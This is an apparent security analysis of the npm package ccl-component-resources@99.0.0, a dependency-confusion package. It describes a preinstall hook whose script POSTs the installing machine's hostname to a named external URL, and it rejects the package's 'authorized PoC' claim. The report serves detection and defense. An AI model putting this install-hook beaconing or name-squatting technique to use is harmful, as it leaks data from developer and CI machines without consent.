ccl-component-resources@99.0.0 is a dependency-confusion package: name targets a likely-internal package, semver is set to 99.0.0 to win resolution against private registries, and index.js is an empty stub (module.exports = {}). package.json declares a preinstall lifecycle hook that runs node pingback.js. pingback.js reads os.hostname() and POSTs a JSON payload ({hn,...package name, timestamp}) to https://c.adityasec.com/hJWEvPPiaUrSeF-9_F8XSw on every npm install. Any installer whose private dependency resolution mistakenly pulls this public package will leak the host identifier of the affected dev or CI machine to an external server. The package self-describes as an 'authorized PoC,' but the beacon fires unconditionally for every installer regardless of authorization, and the destination is attacker-controlled from the installer's perspective.